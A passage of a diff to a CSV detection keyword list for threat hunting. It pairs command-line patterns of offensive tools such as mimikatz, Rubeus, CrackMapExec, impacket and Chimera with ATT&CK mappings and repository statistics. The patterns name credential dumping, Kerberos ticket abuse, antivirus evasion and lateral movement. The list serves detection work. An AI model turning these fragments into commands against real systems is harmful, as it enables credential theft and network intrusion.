tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* rid-hijack -*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" "* -rl 4 -ta 8 -t 2100 -an AS8560*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "* rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rockyou.txt *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* rockyou.txt *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "* ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "* rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1644,12 +1644,12 @@ "* rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"* --rules:Jumbo *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* --rules:Jumbo *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "* RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "* rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rustbof *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "* rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" @@ -1660,29 +1660,29 @@ "* -s * -c enable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c remote_posh *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * --method 1 --function shell_exec --parameters cmd:id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -s putty.exe_sig *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -sam * -system * -security * LOCAL > *.out*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -sc GetSyscallStub *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* -sc SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* scan --github-org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* scan --github-user*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" -"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - 